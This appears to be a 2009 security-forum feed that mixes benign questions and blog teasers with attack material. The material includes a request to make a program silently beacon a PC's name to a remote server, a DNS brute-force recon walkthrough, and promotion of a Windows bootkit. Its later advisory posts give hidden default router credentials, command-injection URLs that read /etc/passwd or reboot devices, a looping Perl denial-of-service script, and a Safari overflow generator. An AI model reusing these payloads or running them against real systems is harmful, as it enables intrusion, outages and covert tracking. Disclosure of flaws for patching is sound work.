Last Posts

Guest Post - Https Data Exposure - Get Vs Post

Thu, 19 Nov 2009 23:09:15 +0000

Here is a quick chart showing the data exposure when considering GET vs POST and also HTTP vs HTTPS.

URL arguments refer to arguments in the URL for GET or POST (e.g. foo.com?arg1=something).
Body arguments refer to data communicated via POST paramaters in the HTTP request body.

NOTE: This chart does not address client side caching of temporary files. Caching is a separate issue from the protocol selection and should be addressed with appropriate cache-control headers.

A quick conclusion: The secure choice for transmission of any sensitive data is to use POST statements over SSL/TLS. Any other option will expose data at some point in the communication.

Full post
http://www.shortinfosec.net/2009/11/https-data-exposure-get-vs-post.html

Is There A Feature To View All New Posts Since Last Login?

Thu, 19 Nov 2009 10:51:52 +0000

I remember before the forum upgrade you were able to log in and check 'new posts' and any posts being created since your last visit was shown. Now I can only seem to find the 'active in the last 24 hours'.

Is this feature still available? Can't seem to find it.

Cheers.

Vpn Anonym

Thu, 19 Nov 2009 06:22:17 +0000

Hi ;

I just wanna know if i send and email och surf on the internet , for example site while i am already connected to vpn , is it possible to find out my real ip ? i mean the site owner or the mail reciever ! if yes i wonder how !

5 Important Things To Know About The A Plus Certification

Thu, 19 Nov 2009 03:18:34 +0000

1. The A plus is what most people start with
Comptia (the vendor offering this certification) got it right with the A+ certification. It's extremely popular and no wonder why. The A+ is the very first step in our career ladder and a very important one. Studying for this cert we get down to the basics of what computers are - hardware and software - and in depth learn everything that is important about them. This is what the A+ gives you - an extremely important foundation to work on. Nearly nobody stops at the A+ - it's our very first step towards obtaining other higher certs which gives us higher positions and more money in our pockets.
2. How to study for it [this is important]
New people into the Industry feel unsure on how to best take this first step in their career ladders. Getting your first certification is like getting your first kiss - you always remember more details about it than any other cert you will be getting after that. Always opt to self study, unless your employer is willing to pay for a training school or boot camp. The truth is, entry certifications build a foundation to work on. They do not land you in the big bucks. That comes later. Spending lots of money on training for entry certs doesn't make money sense.
3. There are 4 exams you can choose. Which ones do you do?
The A+ essentials (exam 220-601) is the first one you must pass. After that, you have the choice of:
IT Technician (220-602)
Remote Support Technician (220-603)
Depot Technician (220-604)
Most people do the IT Technician one as it gives you a more rounded knowledge. The other two, specialize so to speak, you should choice either one of these two only if your job requires it.
4. Where can you book the exam?
All comptia exams are booked through Prometric or Vue. Once you finished studying, go to either website and choose your nearest testing center. Pay the fee and book the exam on your choice of date. Now you are all set. When you go to the training center, arrive 30 minutes beforehand and don't forget to bring 2 forms of ID with you.
5. How long does it take for the certification to arrive?
When you complete your exam at the training center and you pass, they will give you a piece of paper stating you have passed the exam. You can use that on your resume for the moment to show employers you are now A+ certified. The actual certification will be posted to you from Comptia and this take around 2 to 6 weeks.
more certification information you can check passcert

Files Download

Thu, 19 Nov 2009 02:15:59 +0000

So when can i download files as it will not alow me to..

[Help] Gui C++ Library

Thu, 19 Nov 2009 01:58:57 +0000

Hey guys ,

Just need some help. . . i'm after a GUI C++ library mainly want a open source one or a free one(W-bb) http://hackhound.net/forum/Smileys/sarcasmics/wink.gif

Thanks ,
DuSTY

How To Make This Program Not Display Error When No Internet Connection?

Thu, 19 Nov 2009 01:51:56 +0000

As the title says, I have a program that someone from this forum helped me with in the past and I need some help again by the looks of it. I dont know much about programming so bare with me. This app was written in the past to work along with a php script I had running on my web server. The purpose was to notify my webserver whenever this program was run and the php script would log the time & date along with the IP and computer name that the notification came from.

So this app when run would simply look up the pc's 'computer name', then goto a certain url where the php script was located and append the computers name to the url. For example the program would open this url "http://www.YOUR-WEBSITE.com/c.php?pc=" and append the computer name it looked up to the end of it.

Now my problem is this program is suppose to run silently in the background, which it does most of the time. The problem is if the program is run when the internet connection is down or unavailable, the program will popup and display a error message. I need help making it so no matter what, this program doesnt display any messages of any kind, error or otherwise, even if no internet connection is available I want it to just silently close.

Does anyone know how I would go about modifying the below source code todo this?

#include 
#include 
#include 

#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#pragma comment (lib, "Wininet.lib")

int main(int argc, char* argv[])
{
	HINTERNET Initialize, Connection;
	char cBuffer[MAX_COMPUTERNAME_LENGTH+1] = {'\0'};
	DWORD dwBytes = MAX_COMPUTERNAME_LENGTH+1;
	char logUrl[100] = {'\0'}; //Make It Smaller (url length + MAX_COMPUTERNAME_LENGTH + 1)

	strcpy(logUrl, "http://www.YOUR-WEBSITE.com/c.php?pc=");

	//BOOL GetComputerName(LPTSTR lpBuffer, LPDWORD lpnSize);
	if(! GetComputerName((LPTSTR)&cBuffer, &dwBytes))
	{
		printf("~~GetComputerName() Failed!Last Error:%s\n",GetLastError());
		return 1;
	}
	//Append Computer Name
	strcat((char*)&logUrl, (const char*)&cBuffer);

	Initialize = InternetOpen( "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)", 
				INTERNET_OPEN_TYPE_PRECONFIG , NULL, NULL, 0);

	// Make The Connection To The URL
	// This Is All That Is Needed To Get Your PHP Script To Log The IP & Computer Name
	Connection = InternetOpenUrl(Initialize, logUrl, NULL, 0,
		INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_RELOAD, 0);
	if(! Connection)
	{	
		printf("~~InternetOpenUrl() Failed! LastError:%s", GetLastError());
		return 1;
	}

	//Close Handles
	InternetCloseHandle(Connection);
	InternetCloseHandle(Initialize);

	return 0;
}

Thanks in advance for anyone that can help!

-elistian

How We Can Change Symbol In Password Field In Javascript?

Wed, 18 Nov 2009 11:13:00 +0000

Friends , I wana know that how we can change text symbol in passwordfield by using Javascript. I mean by default there is filled circle ,but I want "*" this symbol.

How To Extract Hosts In Dns Servers That Block Zone Transfer.

Wed, 18 Nov 2009 09:51:17 +0000

Hy guys,

My first post here, I will add a article I wrote special to GovernmentSecurity, hope it be useful to someone.

Quote

Extract hosts in DNS Servers that disallow zone transfers.

INTRODUCTION:
-------------

Everybody know that the first step in a attack is recognize the target, in the following sequence:

- List machines that is part of the target.
- Identify services and versions in each of this machines.

It's essential, because if a attacker can't list what machines is part of the target, he doesn't have what to attack.

List machines that is part of the target is very useful to attackers when they intend to attack a network well protected, since the main servers would be hardened and constantly monitored, so if an attacker find machines less important probability he will:

- Find machines that aren't so protected as main servers.
- Find machines less monitored.
- As much more machines a attacker find, big is the chance of find a vulnerability.

In the old and good times attackers used DNS zone transfer to list all machines in a domain they plain to attack, however DNS zone transfers have been more rarely to work because the enhance of security.

Just to illustrate, let's try a DNS zone transfer from microsoft.com:

FatalFury:~/tmp# dig microsoft.com axfr

; <<>> DiG 9.2.3 <<>> microsoft.com axfr
;; global options: printcmd
; Transfer failed.

As we expected to see the DNS Zone transfer failed, however exist a way to extract this hosts, it's called DNS host brute force, which basically brute-force common names of hosts via DNS query and based on response from DNS server it identify if the host exist or not.

To explain in details how it work, let's suppose that an attacker want to list hosts in the domain microsoft.com, so the following steps will be followed:

1) The program open a wordlist of common hostname and read one by one.

2) Each hostname entry in this file will be concatenated with the domain, for example auth.microsoft.com, database.microsoft.com, ftp.microsoft.com, etc.

3) Each one of this FQDN (fully qualified domain name) generated will be requested to the DNS server.

4) DNS server will response to client saying "auth at microsoft.com is a non-existent host", so based in this response the program know that this host doesn't exist.

5) DNS server will response to client saying "database at microsoft.com is a non-existent host", so based in this response the program know that this host doesn't exist.

6) DNS server will response to client saying "ftp at microsoft.com point to IP adrress A.B.C.D", so based in this response the program know that the host exist and have the respective IP address A.B.C.D and save it in the list of found hosts.

THE TOOL OF THE TRADE:
----------------------

To illustrate the use of DNS host brute force we will use a tool called WS-DNS-BFX, that in my opinion is the best since it:

- Is very fast because use multi-threads.
- Support IPv4 and IPv6.
- Extract multiple IPs for unique domains (Domains with Network Load Balance).
- Runs on Linux or Windows with cygwin.

This tool can be downloaded from http://ws.hackaholic.org/tools/WS-DNS-BFX.tgz

INSTALLATION:
-------------

Install is very easy, just untar like this:

FatalFury:~/tmp# tar -xvzf WS-DNS-BFX.tgz
./
./README-pt.txt
./dict-file.txt
./Changelog.txt
./WS-DNS-BFX.c
./README-en.txt
./hosts-yahoo.com.txt
./WS-DNS-BFX-Static

Now, we just need to compile like this:

FatalFury:~/tmp# gcc -o WS-DNS-BFX WS-DNS-BFX.c -lpthread -D_REENTRANT -D_THREAD_SAFE

Let's run the compiled program to test if all worked:

FatalFury:~/tmp# ./WS-DNS-BFX

DNS Brute Force eXtract by: Clube Dos Mercenarios & Front The Scene

URLs: http://cdm.frontthescene.com.br
http://www.frontthescene.com.br

Contact: dum_dum@frontthescene.com.br

USAGE mode:
./WS-DNS-BFX

USAGE:
------

Now that we have the tool compiled, we will use a syntax like this:

./WS-DNS-BFX microsoft.com dict-file.txt 14

WS-DNS-BFX - is the name of the tool.
microsoft.com - is the domain name we will extract hosts.
dict-file.txt - is a dictionary file contain common host names that is included in the tool.
14 - is the number of parallel threads that will be used.

NOTE: You should create and use a more robust dictionary file to have better results.

NOTE: The number of parallel threads should be choose based in your connection speed, see README-en.txt for more details.

Let's test the tool to see if it really works:

FatalFury:~/tmp# time ./WS-DNS-BFX microsoft.com dict-file.txt 14
Progress ...........

real 0m3.672s
user 0m0.580s
sys 0m1.380s

In my case with 14 parallel connections it probed 361 hosts in less than 4 seconds!

It generated a report file called hosts-microsoft.com.txt, let's check it:

FatalFury:~/tmp# cat hosts-microsoft.com.txt
-= DNS Brute Force eXtract by Clube Dos Mercenarios e Front The Scene =-

www.microsoft.com{
207.46.20.60
207.46.198.30
207.46.198.60
207.46.199.30
207.46.225.60
207.46.19.30
207.46.19.60
207.46.20.30}

mail.microsoft.com{
131.107.1.71
131.107.0.15}

ftp.microsoft.com{
207.46.236.102}

windows.microsoft.com{
207.46.250.115
207.46.130.104}

exec.microsoft.com{
207.46.248.35}

ircs.microsoft.com{
131.107.3.108}

support.microsoft.com{
207.46.248.248}

register.microsoft.com{
207.46.232.188}

download.microsoft.com{
208.172.65.62
4.78.212.30
206.24.233.62}

search.microsoft.com{
209.152.127.218
209.152.119.242}

As we can see, it extracted 10 different host names, and several distinct IPs to the some host name which indicate that they are over a Network Load Balance.

CONCLUSION:
----------

Even with the restrictions of DNS Zone Transfers, attackers with WS-DNS-BFX and a GOOD dictionary file can extract much hosts, that can be very useful for attackers.

The best method to detect this kind of attack is to monitor the requests to your DNS Server and check for a high amount of requests in sequence from a unique IP and with many replys that say "hosts non-existent".

Obs: I have compiled a good wordlist to this kind of test, if someone have intersting in it I can upload in some place.

Cheers

Beginner In Need Of Some Guidance, C#

Wed, 18 Nov 2009 00:22:25 +0000

Hello everyone, I'm new to the site. I'm currently in college as a computer science major and will be starting my programming courses, hopefully, in the fall. I thought I might get a head start on the curriculum and brush up on my programming before I started my classes and was thinking of starting with either C#. From what I have heard, C# is similar to VB, which I learned back in middle school, but didn't use much afterwards so I have forgotten most of it. I have also attempted, a few times, to dabble in C++, but each time I had some problems with libraries and compiling in windows. I have been using linux for several years out of my own curiousity and from that I learned the ins and outs of compiling programs using gcc, but for some reason my compilers in Windows never seem to work. However, I recently got a hold of a copy of Visual Studio 2003 Professional through my school's MSDNAA program and thought that I might start by seeing if maybe it works better for me then other compilers I have tried in the past.

I'm looking for some guidance as to where to learn C# on the internet. I found some from searching through google, but I'm not sure which ones are any good and which ones I should avoid. Any suggestions that could be provided for good, online, tutorials would be greately appreciated.

Thank you.

C# And Ipb Communication

Wed, 18 Nov 2009 00:14:33 +0000

what class or classes would i use in order to communicate with IPB in C#? i just need to login and make a post.

How To Trust Cloud Computing

Tue, 17 Nov 2009 21:09:43 +0000

Cloud Computing is becoming more and more the buzzword of every conference, meeting and article. Yet it is still in it's inception, and there are multitude of issues and problems. Cloud services are springing up like mushrooms after rain, and all the big players want a piece of the pie.

Here are the mechanisms by which we can approach the level of trust that we have in our infrastructure for the cloud. But bear in mind, that each approach can have it's own pitfall!

Full Story
http://www.shortinfosec.net/2009/11/how-to-trust-cloud-computing.html

Offensive Security Has A Milw0Rm Replacement

Tue, 17 Nov 2009 09:05:01 +0000

Milw0rm is not being updated much anymore, but it seems offensive-security has started it's own archive:

/http://exploits.offensive-security.com/

Stoned Bootkit

Mon, 16 Nov 2009 21:15:31 +0000

Quote

"Stoned Bootkit is a new Windows bootkit which attacks all Windows versions from XP up to 7. It is loaded before Windows starts and is memory resident up to the Windows kernel. Thus Stoned gains access to the entire system. It has exciting features like integrated file system drivers, automatic Windows pwning, plugins, boot applications and much much more. The project is partly published as open source under the European Union Public License. Like in 1987, "Your PC is now Stoned! ..again".
Peter Kleissner, Software Dev. Guru in Vienna

"A bootkit is a rootkit that is able to load from a master boot record and persist in memory all the way through the transition to protected mode and the startup of the OS. It's a very interesting type of rootkit." - Robert Hensing about bootkits

Stoned..

■is a software in the Master Boot Record, with the target to be memory resident up to the Windows kernel
■attacks Windows XP, Server 2003, Vista, Server 2008, 7
■supporting architecture: IA32, AT Architecture (IBM-conforming)
■full featured, including own file system drivers for FAT and NTFS!
■supports different boot media, hard disk, removable-media, cd, dvd, flash drives, network..
■there will be new versions, plugins and updates!
It has been sucessfully tested and verified on following systems:

Windows 2000 SP4
Windows XP SP2
Windows XP SP3
Windows Server 2003
Windows Server 2003 R2 SP2
Windows Vista
Windows Vista SP1
Windows Server 2008
Windows 7 Build 6801
Windows 7 Beta
Windows 7 RC
Windows 7

DiskCryptor 0.7
DiskCryptor 0.8
TrueCrypt 6.1a
TrueCrypt 6.2
TrueCrypt 6.2a

Bochs 2.4.1
VMware Workstation 6.5.0

EeePC 901 Windows XP SP3
Dell Studio XPS 16 Windows Vista SP1

Read the full article + FAQ at :

h**p://www.stoned-vienna.com/

There you will be able to download the software and burn in a live cd, then test it.

Guest Post - It Risks Vs. Information Risks

Mon, 16 Nov 2009 19:45:01 +0000

As an Information Security professional I think it is increasingly important to understand the difference between IT Risk and Information Risks. You should also understand the advantages in enabling business strategies by ensuring that you brand each one of these risks accordingly.

Here are my high level definitions:

IT Risks - The probability that a vulnerability of an information technology solution or asset will be exploited and the likely damage from the exploitation.
Information Risks - The probability that information/data can be exploited and the likely damage from the exploitation.

While these may seem similar to the layman, they should clearly be viewed and positioned differently by the Information Security professional. Here's why:

IT Risks should have a focus on technology, while
Information Risks should not have a focus on technology

This is a guest post by Mark Brooks, a consultant and leader in the field of global information risk, security, and compliance.

Full story http://www.shortinfosec.net/2009/11/it-risks-vs-information-risks.html

Google Wave Invites

Mon, 16 Nov 2009 17:45:14 +0000

Hi,

As you may know Google Wave have released over 100.000 invites each holding 8 other invitations. Would anyone happen to have one for me? My invites will be spread among GSO's members ofcourse

Regards,

Dennis

Vb.net 2k5 Packet Reading And Logging

Mon, 16 Nov 2009 04:34:33 +0000

im trying to write a program to read the packets from a specific application and upload those packets as text files to a remote server

any ideas how i can do this
the only dev software i have at this time is visual studio 2k5 express

Messenger Bot

Sun, 15 Nov 2009 21:48:13 +0000

Does anybody have any resources or links where i can find a Windows Messenger "Bot"

all i want it to do is login and basic chat.

ive founds 1000's on google that all seem outdated (like 2001) and no longer work..

This is not a request for IRC bots or botnets, but a simple MSNBOT.

thanks!

Ipsec Debugging

Sun, 15 Nov 2009 19:27:45 +0000

Hey guys,

I have to do a brown bag at work going over IPSec debugging...specifically ASA's and PIX. Whenever I look around for information on IPSec debug i am only able to find debug output and then the answer on what the problem is. Any ideas as to where to find actual white paper or other documentation on how to decipher alot of the information given on a debug?

Appreciate your help,

-Lex

Owasp Publishes Top 10 Web App Security Risks For 2010

Sat, 14 Nov 2009 18:18:53 +0000

Last night the OWASP project published the 2010 issue of their Top 10 Web Application Security Risks. The list is still in Release Candidate status, so it may change. It is evident that OWASP hasn't invented the wheel all over again, and that this list has already been discussed for years. Yet it still falls on deaf ear for many developers

Full story
http://www.shortinfosec.net/2009/11/owasp-publishes-top-10-web-app-security.html

Is There Software Which Will Block Incoming Connections Based On The Ports They Have Open?

Sat, 14 Nov 2009 12:35:44 +0000

Hi,

I would like to be able to block certain IPs from connecting to my machine based on which ports they have open. Does this software exist?

If there is not a specific package that can do this then I was thinking of piping tcpdump to a perl script which grabs the IP of any new connection, nmaps them and blocks them using IPTables if they have certain ports open. Obviously there would be a few seconds when they would not be blocked - I don't particualy mind this. Could probably start off with a very low MTU and increase it once they have passed the portscan. Does anyone have any advice / suggestions about this?

The purpose of this is to stop people from connecting to the machine via SSH shells, RDP, VNC, proxies, tor, i2p, freenet etc etc.

Thanks,

Fractal5

Bypassing Stack Cookies, Safeseh, Hw Dep And Aslr

Sat, 14 Nov 2009 06:29:29 +0000

This is an article I found very informative.
Should be a good read for exploit writers.

Quote

The success of all of these exploits (whether they are based on direct ret overwrite or exception handler structure overwrites) are based on the fact that a reliable return address or pop/pop/ret address must be found, making the application jump to your shellcode. In all of these cases, we were able to find a more or less reliable address in one of the OS dll’s or application dll’s. Even after a reboot, this address stays the same, making the exploit work reliably.

Fortunately for the zillions Windows end-users out there, a number of protection mechanisms have been built-in into the Windows Operating systems.

- Stack cookies (/GS Switch cookie)

- Safeseh (/Safeseh compiler switch)

- Data Execution Prevention (DEP) (software and hardware based)

- Address Space Layout Randomization (ASLR)

http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/

Analysis Of Windows Security Logs With Ms Log Parser

Sat, 14 Nov 2009 06:20:09 +0000

When investigating an intrusion in a Windows system, one of the first places to start is the Windows security log. Security event log is also very useful for analysis when searching for anomalies and possible intrusions.

Reading through a Windows security log or any other log can be very difficult and time consuming, so a lot of companies have created their own tools to analyze windows event logs. But before you start going commerical, there is a tool that will get you going without any cost. Against all odds, it's a tool made by Microsoft!

The tool
The tool in question is Microsoft Log parser. Log parser is a command line tool that provides universal query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows operating system such as the Event Log, the Registry, the file system, and Active Directory. So, you can use it to analyze most structured text based files and the eventlog and AD on a single computer.

Full Story
http://www.shortinfosec.net/2009/11/analysis-of-windows-security-logs-with.html

Enable Telnet Server Xp

Sat, 14 Nov 2009 05:19:45 +0000

Does windows xp come with a telnet server? If so how do i enable it on my computer so i can telnet to it?

Very Important! Which Services Cna I Install On Windows Which Are Easily Exploitable Although Pref Not Via Proxies

Sat, 14 Nov 2009 00:52:13 +0000

Background information:
A while ago my girlfriend's daughter was mollested by her father. It never went to court since a 2 year old's statement doesn't count for much these days. Soon he will be able to have visitation rights again and will be able to have her over for the night at weekends. Various events have taken place which have resulted with him being cautioned for harassing us, a couple more and he will no longer be allowed visitation. He is employed in the IT industry as am I. There is currently a court battle going on over money etc, he is very interested in what we are doing in relation to this.

What I am thinking of doing is setting up a very insecure email server from my home network, finding some reason to email him and monitoring the server. After speaking to my girlfriend it seems like he is the kind of person who would try to hack it (especially considering the on going court case.) I'm going to disconnect all other machines from the network and add a linux server, on this I will run a sniffer and VMware. Within VMWare I intend to run an XP box. I will isolate the virtual from the rest of the host OS using ebtables and from directly connecting to the router using iptables (whilst still allowing NAT and port forwarding.) I will also ask our ISP to monitor our connection.

Obviously it is very easy to make an XP machine insecure, however if I was him then I would do any hacking etc via some kind of proxy or onion routing system. I've been racking my mind for how to tackle this. The only things I can think of are UDP based services (very open rsync over UDP maybe?) TOR doesn't support UDP (I imagine I2P, Freenet etc dont either) however Socks5 proxies do support UDP. The only sure-fire way that I can think of to make sure that he doesn't use some form of proxy would be to use a service which initiates a connection back to his computer (or having a massive black list of all proxies/TOR nodes etc.) I can't think of anything which would accomplish this without seeming too obvious. Can anyone help?

Thanks,

Fractal5

Metasploit 2.4

Fri, 13 Nov 2009 21:55:49 +0000

Hello everybody,

hope someone can help me,
I´ve installed on windows 7 metasploit framework 2.4 ( with the msfconsole.bat etc )
directory is C:\programs\metasploit framework\
now, if I try to open the msfconsole.bat
there is only coming up my computer or administrator name...

User-@User-PC ~
$

does anybody know what I´m doing wrong ? the same was working on vista before
maybe something wrong with the directory in any batch file or somewhere ?

thank you

How To Find Out Ip Address From Mac Address ?

Wed, 11 Nov 2009 19:57:46 +0000

There's this guy doing ARP spoofing on my network, i came to know his MAC address through a wireshark packet capture. But i need to know who this guy is . I'm assuming i must do a RARP request , but how do i do that ? Any software that lets me find real IP address from MAC Address ?

http://img245.imagevenue.com/loc560/th_86159_Untitled_122_560lo.jpg

What's Your Favorite Linux Distribution ?

Wed, 11 Nov 2009 19:11:31 +0000

Hi there ....
there is many linux distributions ....
what's you linux distribution ?
What's your reason for using this ?

Nemesis: Problem With -O O Ip-Options-File Switch

Wed, 11 Nov 2009 15:32:46 +0000

Hello all,

I am using nemesis on windows XP to generate fake packets. I want to give "[94][04][00][00]" in IP option section. I have created a file using hex editor which contains these bytes. However, when I am giving it in -O switch, I am getting 4 Zeros in the option section ([00][00][00][00]). Interestingly, if I write "abcd[94][04][00][00]" in the text file, I see "[94][04][00][00][00][00][00][00]" as IP option. I see same the output if instead of file, I accept IP option from stdin (using "-O -" switch). Please tell me where I am going wrong. Thanks in advance.

Palm Pre Webos Version <= 1.1 Floating Point Exception

Tue, 10 Nov 2009 07:56:26 +0000

I.  Description 

The Palm Pre WebOS version <= 1.1 suffers from a floating point exception vulnerability when 
attempting to view a specially crafted web page. This vulnerability has been addressed in the latest 
patch from Palm and all users are recommended to update to WebOS version 1.2+. 

II.  Impact 

If a user views a malicious web page that contains specially crafted data, the "LunaSysMgr" process 
will crash, causing the device to simulate a reboot.  The bug itself is a floating point exception 
that crashes the "LunaSysMgr" process and forces the device to restart the process, simulating a 
reboot of the system.  At the time of the discovery, the greatest risk to the system was a denial of 
service condition. 

The crash does not occur when viewing the malicious web page while in landscape mode. 

III. Proof of Concept 

The Palm Pre WebOS version <= 1.1 will crash upon opening a web page that contains 50,280 bytes of 
data or greater and attempts to refresh the page.  Upon viewing the malicious web page the 
LunaSysMgr process will generate a floating point exception and simulate a system "reboot". 

The following code will trigger the issue 

"AAAAA..." using 50280 or more characters after the refresh. 

IV. About 

This vulnerability was discovered by Townsend Ladd Harris  

Vulnerability details will be posted at: 
http://tlhsecurity.blogspot.com/2009/10/palm-pre-webos-version-11-floating.html

3Com Officeconnect Firewall/router Multiple Remote Vulnerabilities

Tue, 10 Nov 2009 07:53:36 +0000

************************************************************** 
Product: 3Com OfficeConnect Firewall/Router 
Website: http://www.3com.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote command execution and password disclosure 
************************************************************** 

####### Admin password disclosure ####### 

1) SSH/Telnet to router using one of these hidden accounts: 
  support:support 
  user:5 
  nobody:admin 
2) Type 9 
3) Type 1 
3) Type 3 to dump the configuration 
4) Locate the sysPassword field: 
    
5) Decode the admin password: 
  roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d 
  qwerty 


####### Remote command execution  ####### 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd 

To see the command output you need to log into the router, however the 
command is executed even the user is not logged in, so if you don't 
have access to the device a DOS is also possible: 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot

Emc Replistor Server (Rep_Serv.exe) 6.3.1.3 Remote Dos

Tue, 10 Nov 2009 07:51:37 +0000



original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html

Websense Email Security Web Administrator Dos

Tue, 10 Nov 2009 07:50:27 +0000

Advisory ID:            NSOADV-2009-002 
 Found Date:             28.09.2009 
 Date Reported:          01.10.2009 
 Release Date:           20.10.2009 
 Author:                 Nikolas Sotiriu 
 Mail:                   nso-research (at) sotiriu.de 
 URL:                    http://sotiriu.de/adv/NSOADV-2009-002.txt 
 Vendor:                 Websense (http://www.websense.com/) 
 Affected Products:      Websense Email Security v7.1 
                         Personal Email Manager v7.1 
 Not Affected Products:  Websense Email Security v7.1 Hotfix 4 
                         Personal Email Manager v7.1 Hotfix 4 
 Remote Exploitable:     Yes 
 Local Exploitable:      Yes 
 Patch Status:           Patched with Hotfix 4 
 Disclosure Policy:      http://sotiriu.de/policy.html 
 Thanks to:              Thierry Zoller: for the permission to use his 
                                         Policy 



Background: 
=========== 

Websense Email Security software incorporates multiple layers of 
real-time Web security and data security intelligence to provide 
leading email protection from converged email and Web 2.0 threats. 
It helps to manage outbound data leaks and compliance risk, and enables 
a consolidated security strategy with the trusted leader in Essential 
Information Protection. 

(Product description from Websense Website) 

The Websense Email Security Web Administrator is a webfrontend, which 
enables you to access the message administration, directory management 
and to view the log. 



Description: 
============ 

The Web Administrator frontend (STEMWADM.EXE) listens by default on port 
TCP/8181. 

If an attacker sends a HTTP Request to port 8181 without waiting for a 
response the webserver crashes. The proof of concept script just sends 
a "GET /index.asp" and closes the socket. The server can not response 
to the request anymore and dies. 

By default the service will always restart after a crash. So the poc 
will send the request until it will be stopped. 



Proof of Concept : 
================== 

#!/usr/bin/perl 
use Socket; 

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ", 
"  \n"; 

print "\nThe Webserver on http://$target:$port should be dead until", 
"this script is running\n"; 

while (1) { 
$ip = inet_aton($target) || die "host($target) not found.\n"; 
$sockaddr = pack_sockaddr_in($port, $ip); 
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n"; 

connect(SOCKET, $sockaddr) || die "connect $target $port error.\n"; 

print SOCKET "GET /index.asp"; 
print "Request sent ...\n"; 

close(SOCKET); 

sleep 1; 

};

Everfocus Edr1600 Remote Authentication Bypass

Tue, 10 Nov 2009 07:48:42 +0000

************************************************************** 
Product: [b]Everfocus EDR1600[/b] 
Version affected: all 
Website: http://www.everfocus.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote DVR authentication bypass 
************************************************************** 

The EDR1600 firmware don't handle correctly users authentication and sessions. 

This exploit let you to connect to every remote DVR (without username 
and password) and see the live cams :) 

Exploit: http://www.andreafabrizi.it/files/EverFocus_edr1600_Exploit.tar.gz

2Wire Remote Denial Of Service

Tue, 10 Nov 2009 07:45:21 +0000

======================================== 
              2WIRE REMOTE DENIAL OF SERVICE 
        ======================================== 


Device:      2wire Gateway Router/Modem 
Vulnerable Software:   =< 5.29.52 
Vulnerable Models:   1700HG 
        1701HG 
        1800HW 
        2071 
        2700HG 
        2701HG-T 
Release Date:    2009-10-29 
Last Update:    2009-09 
Critical:    Moderately critical 
Impact:    Denial of service 
     Remote router reboot 
Where:      From remote 
     In the remote management interface 
Solution Status:   Vendor issued firmware patches 
        Providers are in charge of applying the patches 
WebVuln Advisory:   1-003 


 BACKGROUND 
======================= 

The remote management interface of some 2wire modems is enabled by 
default. 
This interface runs over SSL on port 50001 with an untrusted issuer 
certificate. 

++Espanol 
Algunos modems 2wire tienen la interfaz remota habilitada por default. 
La interfaz utiliza SSL con un certificado invalido en el puerto 50001. 


  DESCRIPTION 
======================= 

Some 2wire modems are vulnerable to a remote denial of service attack. 
By requesting a special url from the Remote Management interface, an 
unathenticated 
user can remotely reboot the complete device. 

++ 
Algunos modems 2wire son vulnerables a un ataque de denegacion de 
servicio. 
Un usuario no autenticado puede reiniciar el dispositivo enviando una 
peticion a 
la interfaz de Administracion remota. 


 EXPLOIT / POC 
======================= 

https://:50001/xslt?page=%0d%0a 


 WORKAROUND 
======================= 

Disable Remote Management in Firewall -> Advanced Settings. 

++ 
Deshabilitar Administracion remota en Cortafuegos -> Configuracion 
avanzada 


  DISCLOSURE TIMELINE 
======================= 

2009/09/06 - Vulnerability discovered 
2009/09/08 - Vendor contacted 


                 ======================= 

                          h k m 
                       hkm@hakim.ws

Safari 4.0.3 (Win32) Css Remote Denial Of Service Exploit

Tue, 10 Nov 2009 07:38:08 +0000

#!/usr/bin/perl
# ithinkthereforeiexist.pl
# AKA
# Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 11.09.2009
#
# *********************************************************************************************************
# Another remotely triggerable STACK_OVERFLOW in Safari on Windows...
#
# (204.72c): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=000333d8 ebx=000fbd16 ecx=00000000 edx=037b3fd0 esi=037b3fd0 edi=0001bfad
# eip=00ae19af esp=00032ea8 ebp=00032f28 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Safari\CoreFoundation.dll - 
# CoreFoundation!_CFStringEncodeByteStream+0x2d:
# 00ae19af 8365b800        and     dword ptr [ebp-48h],0 ss:0023:00032ee0=00000000
#
# A product of Browser Fuzzer 3 :)
#
# "We do it in the dark, with smiles on our faces"
#
# *********************************************************************************************************
# ithinkthereforeiexist.pl

$html = "ithinkthereforeiexist.html";
$css  = "ithinkthereforeiexist.css";

$size = 114600;

$htmldata = "\n\n\n\n";
$htmldata = $htmldata . "\n\n\n\n";

$cssdata = "#die\n{\nbackground: url(" . "A" x $size . ");\n}";

     open(FD, '>' . $html);
     print FD $htmldata;
     close(FD);

     open(FD, '>' . $css);
     print FD $cssdata;
     close(FD);

Quiksoft Easymail 6 (Addattachment) Remote Buffer Overflow Exploit

Tue, 10 Nov 2009 07:36:40 +0000


    <!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      -- 
      -- Its old and the latest version doesn't support this method. 
      -- I was bored and a similar post sparked my interest. 
      -- 
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      -- 
      -- Written by:
      -- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
      --  -->
 Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit

Source: http://www.milw0rm.com/exploits/9705

Pidgin Msn <= 2.5.8 Remote Code Execution Exploit

